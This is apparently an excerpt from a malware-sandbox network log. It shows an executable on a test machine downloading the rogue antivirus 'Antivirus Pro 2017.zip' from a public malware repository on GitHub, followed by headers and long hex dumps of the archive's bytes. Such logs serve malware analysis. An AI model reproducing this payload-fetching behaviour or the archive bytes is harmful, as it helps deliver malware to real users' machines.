                                                                                                                                                2022-09-29 12:51:33 UTC9683INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                33192.168.2.549733185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:33 UTC9685OUTGET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:33 UTC9685INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 813771
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "1678d463fe21840e0502334b52db05d49c7f0867ee8fb74db3e4927c4d982da5"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 3596:11E0C:3902DE:4007EA:6335934F
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:33 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6949-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455893.244693,VS0,VE169
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: d92f7718861b131d03f878e3ff0b0e61d38cf5a5
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:33 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:33 UTC9686INData Raw: 50 4b 03 04 14 00 01 00 08 00 cc 71 b9 46 6e c1 a3 ac 07 6a 0c 00 55 c0 0c 00 1f 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 41 6e 74 69 76 69 72 75 73 50 72 6f 32 30 31 37 2e 65 78 65 25 07 aa cf 03 18 83 7f 90 f2 82 f4 4a c8 91 04 12 f4 c4 35 54 d1 11 fd 0b 95 82 b9 13 b7 bf ef ba 38 2e 1d 4b d8 08 b2 b2 43 b5 a3 c0 d7 77 ed 2b c1 26 7f 20 26 33 e5 c7 4d 54 26 f0 44 95 ed 24 60 75 a5 2f 65 d6 52 1e 72 1c ea 7f a8 b3 3d 44 30 b5 dc dc db 90 fe 82 c7 fd 4f 86 8d 27 85 b6 72 8e ae 12 2a ad b0 25 90 de 7a 75 d2 aa 99 19 f6 fd 5d 6e 54 90 91 de 62 38 63 db c3 14 35 94 7b 01 85 fb c5 24 57 65 48 4b 7c b8 4f 63 62 d8 e8 e9 04 68 da 36 23 dc 71 44 85 2a 59 00 ea 11 b8 97 f1 d7 5c 82 74 12 86 14 b2 3f 6d 49 f9 0b 3b d7 5f 0f 8d 62 6d f9 90 02 8f e6 1d e4 fc 16 80
                                                                                                                                                Data Ascii: PKqFnjUEndermanch@AntivirusPro2017.exe%J5T8.KCw+& &3MT&D$`u/eRr=D0O'r*%zu]nTb8c5{$WeHK|Ocbh6#qD*Y\t?mI;_bm
                                                                                                                                                2022-09-29 12:51:33 UTC9687INData Raw: ab 17 0e e6 c8 5b cb 31 0a 45 d9 4a 0a c4 83 75 cc a9 18 a7 40 ea b7 a4 d2 74 26 d3 2b 1c 6f 4f a0 b9 42 9d 20 41 5c 90 0e 71 73 d2 5c e6 6d db ac 4e bd e8 5c 44 ce 6c 69 8f 0a 3e c6 39 20 df cc a3 69 36 23 ff 5b df f6 c2 dc c4 48 f5 d8 15 b5 b5 12 ae 71 3c 3d 27 e3 ef e6 f8 dc 33 b1 04 a8 e2 c9 d6 10 02 10 6f 56 b9 21 70 58 e3 33 0b 3f fc 79 c5 97 c8 88 b9 31 35 39 b0 a7 e6 09 78 c1 da 3e ad 71 dc 0b bf 6f a7 d3 a6 2b 84 a6 7f fd 4c c4 f5 d6 84 36 22 eb 3c 2c a8 54 8d f9 41 d2 56 d4 f2 03 52 a5 87 7f a5 ed a3 cd ef b8 8a b0 0b ca 1d fe 27 74 0c 4e 32 7a 0b c6 2a 4c 19 5b 28 d3 60 e0 bb d8 e6 b7 94 84 2a fa b8 fe c2 24 61 73 97 0f 42 52 bc 24 c1 9e a2 e5 8d f6 55 96 4c 13 2b f5 09 3c da f6 b4 44 49 78 78 5c 22 c8 59 27 30 78 39 6f f2 04 12 ee e7 65 ab e2
                                                                                                                                                Data Ascii: [1EJu@t&+oOB A\qs\mN\Dli>9 i6#[Hq<='3oV!pX3?y159x>qo+L6"<,TAVR'tN2z*L[(`*$asBR$UL+<DIxx\"Y'0x9oe
                                                                                                                                                2022-09-29 12:51:33 UTC9688INData Raw: 14 58 9b 98 fa 4d c0 77 31 1b 88 fb 5c 32 b8 22 ff 90 76 c7 38 66 10 fe ce f7 1f 2c d9 f6 34 87 bb 52 fa f2 bc 9b 5d 17 46 84 58 8f e4 62 44 94 f4 62 55 f2 3f c3 e3 ab 5d ee 12 57 7d c4 60 cc 2f 04 5f 4d 81 ec 05 d7 62 15 66 68 5d 02 7c a8 2d c4 42 01 4b ed c5 13 6e 6c c3 d3 b2 b4 3c 81 57 b2 ad 21 69 a6 6a 1c e4 40 71 80 d1 46 7a 76 24 b3 b4 3c e1 44 57 40 9c 3a 89 ac 29 80 a3 c1 dc 48 9c 44 da e1 cf dc a7 2e 9c dd 54 ee b0 0d 99 bc 31 7f 66 1a 33 1b f2 03 83 82 6b 0e cf 22 99 d7 4a b4 48 2d 85 51 ac 95 d9 7b d6 37 5a f5 df 47 d2 5c 22 fd 86 73 02 0a a0 46 f7 c6 fb 97 1a 71 68 16 88 27 b3 f4 8d 14 4d e4 1d 94 84 a1 03 de 16 e4 3f 5a f7 a4 97 2e 50 e9 5c 19 7b 07 ac 2e 50 5f f1 a7 c1 13 c3 d7 8e b2 c6 4a cf 72 c4 08 d6 e7 2d e0 c6 c9 47 85 29 bc 78 99 46
                                                                                                                                                Data Ascii: XMw1\2"v8f,4R]FXbDbU?]W}`/_Mbfh]|-BKnl<W!ij@qFzv$<DW@:)HD.T1f3k"JH-Q{7ZG\"sFqh'M?Z.P\{.P_Jr-G)xF
                                                                                                                                                2022-09-29 12:51:33 UTC9690INData Raw: 50 77 6c e2 c9 08 2f 4d a0 aa 5b 75 b5 16 d3 ae 83 5d 3a f4 68 f4 ee 37 96 d4 08 10 15 57 ab 80 84 f2 f7 be 30 29 ba eb e2 35 bf e2 14 a4 4c 2b 71 97 8d 12 18 27 0b 1f 12 8b f9 87 26 d7 34 d3 98 a8 41 d5 61 df 1c a5 83 48 c3 0c 55 d5 88 c2 77 e8 db fe 25 69 d2 5c f5 2d 48 a2 0b ef 83 9a fe 0d 3d 1a a1 c9 b8 b6 72 71 7f 09 27 69 5c af 31 00 83 eb ad bc bc 88 31 52 f2 d4 a0 35 5d 59 53 ed b3 a0 f9 9b 92 0b f0 e0 e8 3c 7c 74 f4 b9 36 bd 39 ca ae 78 a4 fb 7f f0 88 14 67 b1 47 25 97 cf 33 19 08 7a 4d 73 7f d8 9c a6 e9 18 a0 25 af 1e 43 b3 4f 76 cf ce da 0b b4 32 ed b0 c0 9c 87 83 e4 6d 10 0a 38 dc 4d c4 42 f9 2e 92 25 c7 43 bb 7c 5d 6f 82 f4 9d 47 04 a2 b8 2d 19 14 da 6d 55 6a ea 12 a4 10 02 2b e9 73 40 f5 ba d9 62 79 fe 49 d6 96 4a 46 04 6c 2f 06 19 84 ae 20
                                                                                                                                                Data Ascii: Pwl/M[u]:h7W0)5L+q'&4AaHUw%i\-H=rq'i\11R5]YS<|t69xgG%3zMs%COv2m8MB.%C|]oG-mUj+s@byIJFl/
                                                                                                                                                2022-09-29 12:51:33 UTC9691INData Raw: e6 80 9f 29 7b 8d 25 22 f4 24 50 b6 de 37 65 cf f0 86 79 3b 2d 1d bc 2e 36 be 98 1d be 38 55 6d 72 c6 c5 24 ef fe b2 e6 4b b3 01 a4 69 88 bf 7f c4 db 7f 2f e3 41 73 8b 6e 33 92 99 3f 48 fe fc 52 f3 96 fa e5 8c 14 6f f6 c2 bd c7 7a 81 d0 25 a7 b6 d6 23 47 6f 4f 0a 73 56 77 06 72 1d 74 f6 e3 c6 c9 46 1f 9a a0 d2 a0 99 78 a7 3a 64 f8 ac fd 9f b9 f6 bb bf ef 4a 6d 27 3a 46 91 ed 65 50 a1 ae 76 58 32 14 96 a4 76 c0 36 39 de ea fa 3d 5e eb 0e e8 02 c3 5c 57 b2 91 34 74 dc 84 04 82 df 1e 36 06 ff ff 6e 3f a8 38 ec 23 be 00 92 d0 de f8 5c 08 ae 5b e4 69 dd c2 cf 9d e0 0b 16 4c 4c 92 ad 2a e5 f2 02 4d bd 42 05 36 8e 6d 5f 2c 8f a1 5b 50 34 bf 39 95 5b 50 bd d4 89 98 9c c7 6a 72 df da 56 7a 13 80 a7 4b 2a 4d c7 7b 6e d1 b5 da 2d f9 f6 5c 1f f4 c3 26 05 14 ad d9 70
                                                                                                                                                Data Ascii: ){%"$P7ey;-.68Umr$Ki/Asn3?HRoz%#GoOsVwrtFx:dJm':FePvX2v69=^\W4t6n?8#\[iLL*MB6m_,[P49[PjrVzK*M{n-\&p
                                                                                                                                                2022-09-29 12:51:33 UTC9692INData Raw: 72 27 a8 80 09 bf b5 57 dd 6a cf b4 13 ad b8 7d ec 4c 09 dd 62 29 5b 56 5a 08 75 da 61 08 15 d4 15 9b 31 92 1c 47 01 03 d0 ba 8b fb 0e 75 8b 3f e0 00 4f 8b 30 d9 2d 0f be e3 29 6f 23 bf 08 22 f3 c1 54 ae 2b f6 52 95 01 d0 be e3 58 d5 ad 12 a0 74 8c 09 6b 30 04 b2 22 5f f6 b5 ac 38 3d 05 63 d7 46 98 9f 2e 68 ee 0b 1b 04 1d 76 37 a1 35 24 9a c8 7a ff a1 08 0c 47 db 08 5d d2 d4 70 e1 97 29 69 90 36 c0 a8 be ec 8c 05 91 60 c0 78 14 9a d1 65 e3 1f 1f 18 16 7d ee 47 bb 14 cf 73 ab 11 64 27 17 21 60 f1 df bc df 35 49 0d a7 39 74 bc 4f 21 b8 16 b0 f2 b1 fa 5e 90 38 56 28 12 b1 ec ad 04 59 8c d0 72 33 21 d8 6b ec d3 6e ff 6c a7 3f bc 0e 21 d0 5e b0 3a ef 3e 03 43 e8 d8 c8 3f 37 3b 4a 86 50 aa 71 bc 87 4e 47 26 46 12 fb d1 50 63 28 74 85 55 8d 43 bb 46 01 77 23 67
                                                                                                                                                Data Ascii: r'Wj}Lb)[VZua1Gu?O0-)o#"T+RXtk0"_8=cF.hv75$zG]p)i6`xe}Gsd'!`5I9tO!^8V(Yr3!knl?!^:>C?7;JPqNG&FPc(tUCFw#g
                                                                                                                                                2022-09-29 12:51:33 UTC9694INData Raw: 74 e7 23 8e 88 b3 29 9d 28 d3 c1 b7 d7 e2 47 d9 0c 02 4a 3b 7b c3 d3 5a 63 3b 8d 53 3e 4f c7 e1 a9 15 da 66 6b 2d b2 45 c2 73 5d a8 39 00 12 44 93 27 96 b6 05 84 d0 b5 52 c1 3e cd 21 80 04 40 0c 2c 4f fa 13 b7 58 f6 ce 0e f5 19 35 0e 83 a3 a5 09 31 6d 08 a8 7b 39 47 78 48 a8 1a 34 1d dc c9 3f 90 df b6 5c 94 3f 4a 68 5a 6f dc a0 9a 5a 1e b5 73 e6 00 ca 44 6a 98 6d a8 a9 f2 23 fe b6 14 9e 0f 36 3e e5 b4 39 fb b1 1b 5c 03 35 08 b2 e3 3d e0 af 31 35 a4 eb 47 96 aa 94 f2 5e b6 88 4b 44 06 1d 38 e5 4a 80 aa 3b 8d 74 f0 a1 08 2c ae 68 70 04 74 d0 e7 9d f0 00 31 f6 84 1f 11 80 d1 ef c6 af 87 9e ba 12 96 17 51 44 e1 93 15 12 3b 5a 9d c1 53 1f f5 53 5f 85 a4 8c 00 25 3e bc d1 16 c2 79 e5 cd 10 6f f7 44 8a 2d e0 5e 93 28 32 7d b8 16 16 ad dc e9 54 0b 0c 9b a5 20 16
                                                                                                                                                Data Ascii: t#)(GJ;{Zc;S>Ofk-Es]9D'R>!@,OX51m{9GxH4?\?JhZoZsDjm#6>9\5=15G^KD8J;t,hpt1QD;ZSS_%>yoD-^(2}T
                                                                                                                                                2022-09-29 12:51:33 UTC9695INData Raw: 1f ff 29 bc 49 cd a0 82 e3 59 81 a0 4e fd bf 0b e6 fa f2 ee c5 c2 46 eb a0 53 fa b0 fe 86 93 f1 4c ed 6c 67 42 f2 5a e0 a1 9f d2 25 3f 27 1b bc 00 57 ca c0 66 c7 48 0c 31 30 6b f6 09 56 c9 3c bc 41 a4 06 41 6e f2 6b 06 3a 73 dc b9 21 e2 d2 7a 9c 20 17 3d 5c 33 36 80 20 e0 d2 af 6b 7d fe d5 e7 1a 45 a4 3d 3d c7 12 d7 6e ed ee c5 c5 19 71 57 2d ab 1d d6 6d 79 54 be ca 81 7c b6 c1 94 ea 2a 12 98 60 af 89 cd 3c 22 cf e5 07 02 63 46 8a f8 d7 d7 1d 4e b1 aa 1e b8 37 c7 37 20 4c 70 29 13 9c 8a 1c b4 10 88 df 25 51 09 46 49 12 20 e5 c0 56 75 81 1f 59 1f e4 b5 cc d9 5d 17 a3 1a 9c 20 3c b1 11 af 58 76 c5 39 e7 eb 30 80 ed 36 d1 9c f0 0d dc f8 b3 2e 43 6f 19 06 c3 fb b4 8f 59 e1 6a df 82 44 6b a8 d1 32 1b 3e 75 d3 37 0b a2 21 38 5d 7f e4 cb 07 cd 55 ec b7 55 1b ef
                                                                                                                                                Data Ascii: )IYNFSLlgBZ%?'WfH10kV<AAnk:s!z =\36 k}E==nqW-myT|*`<"cFN77 Lp)%QFI VuY] <Xv906.CoYjDk2>u7!8]UU
                                                                                                                                                2022-09-29 12:51:33 UTC9696INData Raw: 84 11 33 65 90 c7 3e 15 20 70 29 bb 5f de d4 91 ba 1d ad 66 a5 56 36 72 13 b2 30 42 f8 bd 5c 22 36 a2 03 7c 53 4f 30 a4 a2 d5 7d 63 54 e2 e5 31 f2 b6 28 7b 9a 6f d1 45 d7 bb b5 7b 17 0a 85 c0 71 e6 6a 28 f4 3a 72 fb b8 fe 0a 73 24 1b e8 39 56 30 1b 54 64 a7 24 1e 2b 6e 3b 34 58 b3 da 94 1a 34 f8 2f 1d c9 8a 23 48 df 62 59 a8 15 04 01 9f 67 51 88 d9 63 94 f6 8d de 0a 69 48 73 05 bc de 50 5d ab 34 62 ac c3 3a 2d 40 12 5e 43 15 5d 0b fd 98 85 e7 16 66 1f 4a 3e da a5 45 74 10 5d 49 10 4c ab 8b 9d 5b 68 5f 8e 84 cd ba 3d a0 47 7b 6a 1b cf 18 ed a5 2e fd eb 95 f1 85 36 98 e0 a1 a5 19 e7 84 74 fd 78 7c 22 e0 08 4e e3 0c 32 02 98 32 bd f5 e4 23 66 c9 59 87 e5 b9 ec 5a de 04 49 d6 61 ad c0 9b 69 72 8a a4 f4 ba d7 a7 9a 1d ea 79 c5 79 9d 32 ca fe 7e 51 3e 4a 8f fe
                                                                                                                                                Data Ascii: 3e> p)_fV6r0B\"6|SO0}cT1({oE{qj(:rs$9V0Td$+n;4X4/#HbYgQciHsP]4b:-@^C]fJ>Et]IL[h_=G{j.6tx|"N22#fYZIairyy2~Q>J
                                                                                                                                                2022-09-29 12:51:33 UTC9698INData Raw: 0a 75 af d5 23 38 e8 aa d7 84 10 18 c9 a5 a3 31 c2 b9 93 37 3c 16 15 ed 69 1d 06 51 32 14 37 a9 0b fb 00 ab f9 01 98 7e 3e 09 b7 09 1e a7 b4 37 5a 5a 6c 15 e7 23 93 7e da 40 f5 c0 e6 50 b0 fd a8 0b f9 4a 29 36 a5 e1 c8 d1 36 94 9b 88 3b 17 8e 4a 6f 0a a9 1a 2e 77 59 cd f0 00 e6 2a 1d 16 06 9a 96 1e 0e c0 c7 2c 7a f2 68 a1 bf e1 ed f9 0d b5 6a 3b 4c c9 25 12 ed ad 6c 80 5a 4a 12 98 94 bc 41 ef 12 a6 d1 88 17 7c 40 80 16 fb 2b d8 66 2e ca 87 ac df 0d 0f 66 dd a1 19 dc 74 bb c9 a5 1d 66 60 a3 91 f2 4f 3b 2a 0c e9 27 d5 73 9f 8a 6b ea 7c f8 78 dc 2f 69 82 87 d2 1e 17 c1 00 ce 6a 65 25 0f 4a af 20 c4 36 f0 46 bb 79 ee c5 35 19 03 ca 63 c1 d0 1d 43 eb e2 22 d8 bf 4e 20 ec c2 04 d7 fb 0e 34 c8 f2 e3 69 0c 1f ad 67 85 60 a6 d3 b0 e0 00 78 d5 02 70 2e 98 fb b3 9e
                                                                                                                                                Data Ascii: u#817<iQ27~>7ZZl#~@PJ)66;Jo.wY*,zhj;L%lZJA|@+f.ftf`O;*'sk|x/ije%J 6Fy5cC"N 4ig`xp.
                                                                                                                                                2022-09-29 12:51:33 UTC9699INData Raw: 8f a4 87 bf 85 d4 d7 5d 75 1a 94 0b 1f f4 6c 81 8d 3d 6c d4 58 70 ed 5b b0 e3 7c 90 f2 f9 dc 8f 1c 55 2c c5 ce 9e b0 b3 d2 eb a4 ef ed dd 2a c0 1e 48 7b e8 9f b4 45 8b 30 7a 6a 0b ba 00 8c 40 b6 42 50 c3 92 27 78 b3 b4 af 08 36 0c b9 ea 13 f4 11 fc 1c 99 91 7b 7a bd 53 ed b5 47 07 b0 a4 c6 a7 ea db 87 e4 18 46 18 67 ba 1e 1c 23 63 88 a4 42 70 48 2b 9a 09 b6 6e af ab 0f 4c 82 70 9c 95 b7 fc 5a 14 99 66 45 a4 29 f5 65 83 ec 07 bc 36 83 d0 71 d8 90 0e 3e f2 25 3b 1e de e3 f9 17 37 c2 50 01 af 7c 19 ba cb a7 57 62 f8 f0 42 e6 e5 49 3e 92 0a f2 ef 59 bc 9c 95 b8 3a 88 25 34 46 00 53 6f f4 78 bf f9 14 c9 7f e8 1d a8 8a 30 3c 01 30 0c 61 fe d0 e2 92 40 ca 52 e0 8b 87 c6 2c fd f8 7e 19 f6 0b df ba a5 d0 80 84 50 24 03 9b da 7c 0f 24 06 f8 04 dc 23 f2 2e 39 5f e1
                                                                                                                                                Data Ascii: ]ul=lXp[|U,*H{E0zj@BP'x6{zSGFg#cBpH+nLpZfE)e6q>%;7P|WbBI>Y:%4FSox0<0a@R,~P$|$#.9_
                                                                                                                                                2022-09-29 12:51:33 UTC9700INData Raw: 50 b9 8e 21 3f ba 22 7a 56 6d e0 14 46 21 eb 84 8e 43 15 f1 f5 a0 7c 53 a1 8d 0d 20 dd bb 95 3a e1 b9 59 7c 87 27 52 7b e8 2c 04 08 56 c7 41 01 44 18 2a f1 2f 24 d3 e7 58 35 59 f4 a8 6a 09 e9 4a a6 af f9 4e f5 b4 e4 e3 93 63 d9 38 cc 2c 36 b1 6c 7a c3 f4 79 d5 30 9a 76 32 d2 7a 15 27 39 52 fe 17 c3 85 33 d5 6e a1 36 50 8e 2b 76 8f 83 0e 0d 99 df 9a 4d 20 46 79 03 7a 2f 05 67 d8 15 0a 12 4f 23 ad f3 e5 b3 1f ac 2b f6 77 66 34 9b da b3 1c b7 d8 db 58 ec d2 3f 30 5a 37 e7 ac 4a cb 16 3e 8d ff 07 e5 d6 69 f7 94 cc 1a e1 cd 66 3b d4 82 18 78 78 1f d5 76 b3 36 cf 5e 80 9f a0 fd ae 63 2c f4 06 b7 74 39 ca c2 0f 08 06 97 66 d4 ba d6 19 a0 56 1f 41 29 3f 91 4b b0 d4 4e ad b0 22 dc a3 17 e9 f3 8f fe 49 9b 96 d8 ac 7d 80 8b d5 9a 17 e3 2b ca df 8d d2 46 44 db 25 69
                                                                                                                                                Data Ascii: P!?"zVmF!C|S :Y|'R{,VAD*/$X5YjJNc8,6lzy0v2z'9R3n6P+vM Fyz/gO#+wf4X?0Z7J>if;xxv6^c,t9fVA)?KN"I}+FD%i
                                                                                                                                                2022-09-29 12:51:33 UTC9701INData Raw: 16 67 a8 c6 ac 31 91 5a 31 e8 c7 bc 4e d5 4f 2d b5 2e 2d 33 00 2f 11 96 dd 06 a5 ad 04 01 71 b2 2e 47 9f 82 1a 53 d6 c9 b5 54 ae 46 63 11 d5 a9 e5 e0 79 3d 69 4a a8 4d ee 10 bf 05 8d cf 7b f1 09 08 4e bb 45 54 c4 b2 7d fb 65 db 5b 6a 63 a9 36 32 1a c5 e4 6a 50 ed 21 a8 7b c4 4e fb 39 04 a1 d9 04 0c f4 cf b5 18 88 83 06 59 dd 2b 43 41 8e f8 e6 93 73 d4 b2 40 f7 16 8b 31 e2 f5 97 a0 cb 52 96 9f 2c e6 cc 84 2f 8c b8 d2 e7 51 c9 29 bc 05 8f 34 d8 d9 3c b6 0b 93 40 42 58 79 55 7d 42 d1 ae d4 e9 f0 e1 8a 1f 6d a5 ad f1 77 ce e5 8d 76 af a2 5f af 90 e7 a4 86 7b 37 7f a3 ec 79 2c 3f 19 56 84 16 5b c9 9e 3b ae 9f 77 44 d7 6d a3 d1 ee fa 34 66 8c 41 f9 4e 7a f1 d3 14 3d fa 1d c6 44 86 04 59 f8 0c 64 85 47 5f 23 38 39 74 8e 0e dc 8f 1a 30 d7 b5 e1 f2 fa 4e b1 a4 2a
                                                                                                                                                Data Ascii: g1Z1NO-.-3/q.GSTFcy=iJM{NET}e[jc62jP!{N9Y+CAs@1R,/Q)4<@BXyU}Bmwv_{7y,?V[;wDm4fANz=DYdG_#89t0N*
                                                                                                                                                2022-09-29 12:51:33 UTC9717INData Raw: 3a f7 1b c9 fa 5d 62 9b 58 9f 90 d9 f1 e4 f9 07 9e 81 b8 ea 58 48 75 e0 57 13 dc 1b 3e 35 a8 3a 09 5d d3 ed 6d 3a b5 23 ef 68 72 ec e7 1a 8c 82 9a 61 1c 19 67 80 b0 8e b2 6d 4b 7c 1e 6c 02 d8 2a 50 6b 63 ba 9f cd 75 a4 b5 d7 a0 a0 58 d8 ce 10 2a 88 a1 79 09 a4 b8 e9 9e 36 7c b1 cd bf 25 75 ba 55 9a f5 36 4f cb 4b 46 ab 6f 3c 19 72 11 cc 3d 6e 27 11 e9 78 1a 55 18 45 4b 7c 6e 77 2f ee 12 9e 61 87 95 c2 b0 0c 32 8b 9a 65 5b d5 b8 be db 8c 27 b0 15 ef 62 47 04 15 a3 d1 6b f5 44 86 56 ca 1b 42 c7 3f 9e 9f 61 55 7f 22 54 b8 4a f1 23 69 93 69 90 c7 fc aa bf 44 74 0c fd 68 8d e5 0a c6 fb 41 20 f0 bb 73 62 ca 30 be 7f 5a be ae ba c4 8a 41 5d 83 07 df b5 33 4a 98 d7 d3 5e b4 f6 1b b1 68 65 8d a0 25 07 d3 44 b9 c2 08 d9 d3 2b 53 94 4f b8 ea 85 a9 29 ad 29 87 1b 33
                                                                                                                                                Data Ascii: :]bXXHuW>5:]m:#hragmK|l*PkcuX*y6|%uU6OKFo<r=n'xUEK|nw/a2e['bGkDVB?aU"TJ#iiDthA sb0ZA]3J^he%D+SO))3
                                                                                                                                                2022-09-29 12:51:33 UTC9733INData Raw: ec b5 cb 41 6e 1b 97 5c b2 78 5c 93 e4 a4 19 1b 40 33 ad f7 7d 7d 2b a3 7a e9 7c 64 35 1b 43 6a a5 b9 61 2a 45 dd ec f7 15 69 e3 cb 05 32 1e 83 29 17 3c 0f 1c eb 0a 80 7f 3b 38 93 b0 c3 5f 1e 47 85 43 8b 5f ff de 25 58 62 8e 9b 55 42 52 31 8b 54 50 5f e2 38 64 36 83 21 9f 86 93 4c 0f ea 63 7c d3 96 9c fa ac 58 1f a8 d9 12 20 8d 2f 6e d2 f1 38 2e 23 ab f6 63 7c 8a ac b4 f5 ba 02 fb 31 16 45 70 1f 4f 15 a1 28 5c ee e1 6f 2a 2f 4f b0 37 bd c6 00 55 7e 52 ee be 60 ad ee 4f 4c bb b6 e5 f8 c6 f7 62 ea 7e f1 af 35 b2 3b e6 82 9b 78 b8 b5 92 e4 e2 9f b6 0e 96 6c f9 24 20 08 2a ad 0a 44 18 2c e4 15 a9 a2 3f 2e 8c 34 1f d0 58 46 03 c9 66 26 9a d4 32 a6 42 72 f9 5b 32 78 f0 4b e4 80 65 66 88 b1 32 59 47 a9 73 dc 48 56 32 3a d5 b1 61 a8 0b 0a bb 80 ed cb 92 d0 7d 8d
                                                                                                                                                Data Ascii: An\x\@3}}+z|d5Cja*Ei2)<;8_GC_%XbUBR1TP_8d6!Lc|X /n8.#c|1EpO(\o*/O7U~R`OLb~5;xl$ *D,?.4XFf&2Br[2xKef2YGsHV2:a}
                                                                                                                                                2022-09-29 12:51:33 UTC9749INData Raw: c8 d5 61 90 d0 a8 00 3a 9d ea 44 e1 c5 ea f8 82 58 4d d4 d2 bd f2 b6 7f 2f c8 d1 04 dc c4 52 f0 3d ec 28 21 41 e1 aa d0 1c 1e db eb e9 8c 36 84 bd 92 4b 23 df 1d aa b3 9e b2 4d 84 55 35 7a 4d 08 ac c0 01 01 8a d2 71 1c 08 ef 9e 0a 0b e8 f5 ae 1c 3d 4a 99 e0 4e 4d 63 bd 29 82 eb 5c db e2 a5 bd fb 8e ed e2 5e a3 92 b0 79 57 e6 a9 7c 0c 54 bf ff ff da d2 61 22 ee 0d 0d e5 ad 7b 25 42 35 cc d2 ef 5b d6 67 45 9b c8 8d f9 53 52 77 48 91 06 e1 9e 8b 63 18 99 d4 fb a5 c5 af 1b 3e b5 10 6b 62 09 12 8e fd 06 ac 7b 20 e1 d3 91 28 36 13 d5 44 d3 72 1b f4 d0 a8 c7 56 a5 aa 1d d8 0c 9c 2e b5 57 b3 94 51 78 5c 7b 1a 53 95 22 69 08 59 97 87 85 4b 76 81 69 97 31 6f 8a 07 98 d9 70 4c db a7 a1 7b 81 99 93 c2 84 5a bb c1 2c 86 ca 6d 5a 08 8a 8b 41 b4 d8 54 88 68 d8 ec 6b 64
                                                                                                                                                Data Ascii: a:DXM/R=(!A6K#MU5zMq=JNMc)\^yW|Ta"{%B5[gESRwHc>kb{ (6DrV.WQx\{S"iYKvi1opL{Z,mZAThkd
                                                                                                                                                2022-09-29 12:51:33 UTC9765INData Raw: 11 9d 9f 46 9d f3 b4 47 9a 74 58 b2 d6 86 23 98 48 be 29 86 a8 77 82 20 a9 28 78 8a 22 52 93 99 ba d2 59 b5 6f 73 72 2a 01 dc ca 57 c2 95 67 ec ac c2 36 90 83 02 c7 82 16 e6 98 3a bf c6 61 10 e0 51 7f f3 54 74 10 ea bb 9e 43 7b 73 76 28 8f f8 32 3a 3d 18 aa 0f 0b 48 a2 ee a0 4d b5 96 f2 b1 4b df 37 82 83 1c 1d 9f f7 bb 1f 02 12 f6 9c d2 aa 35 de 18 8b ba 71 e7 dc 91 f0 98 8f f7 0a 7e e6 cf 6b a7 d9 9a cc 00 42 c7 d3 48 3f 1d 05 93 9a 5f 8b 78 0a 78 46 bc 02 21 db e1 41 3b d4 b3 50 7d 62 6a 0e 36 83 a2 cc cc 36 eb 94 85 8e 9b ba 29 f2 0e 97 da 58 e1 92 59 d2 3d 4c bd 9f c9 42 63 25 9f 26 23 cd 29 52 24 3a de a3 bb 95 64 d0 b3 b9 d6 f1 4a 70 cb 5e 75 23 81 29 31 fc 6c 68 1f 8d b9 84 4d 58 52 1a 62 7c c8 88 9b 7b 3d 98 04 e4 6d 52 e5 34 cf be c6 f3 5b d0 1a
                                                                                                                                                Data Ascii: FGtX#H)w (x"RYosr*Wg6:aQTtC{sv(2:=HMK75q~kBH?_xxF!A;P}bj66)XY=LBc%&#)R$:dJp^u#)1lhMXRb|{=mR4[
